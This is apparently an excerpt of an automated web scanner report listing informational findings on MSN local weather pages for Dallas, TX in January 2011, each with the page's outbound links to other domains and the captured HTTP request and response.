<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFL Experience&p1=[Events+source="vertical"+qzeventid="f538503"]&form=MSNLAP">NFL Experience</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP">2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP">2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=Everything's Bigger in Texas Party DUEX Super Celebrity Party&p1=[Events+source="vertical"+qzeventid="z155484965"]&form=MSNLAP">Everything's Bigger in Texas Party DUEX Super Celebrity Party</a>
...[SNIP]...
<h4 class="h4 cf"><a href="http://www.bing.com/events/search?q=NFLX After Dark at The NFL Experience&p1=[Events+source="vertical"+qzeventid="z157228725"]&form=MSNLAP">NFLX After Dark at The NFL Experience</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=MhTrwKXH&resize=false">Feedback</a>
...[SNIP]...

22.127. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/ten-day.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344870&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /ten-day.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:50 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=afb8b9492c2b42c7879e045551434b33; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=14A5988DFFB34236AF6BEEC4898E91BC; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:50 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49070

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344870&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.128. http://local.redacted/ten-day.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/ten-day.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/ten-day.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406239&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /ten-day.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:39 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA30
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=402c2913a26444f0a8fab0deddb0fe46; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4F74CB36139F4EDB8419292CFC7F0273; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:39 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49198

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406239&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Ften-day.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/forecast?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Compare forecasts from multiple weather providers</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.129. http://local.redacted/weather.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/weather.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/weather.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/forecast?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/today?q=Dallas+TX+weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406224&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /weather.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:24 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=acb0561427894b149cf52a80b9c8b5c8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=81F237145A154546BE9C16F2A256A506; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:24 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 49126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406224&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fweather.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
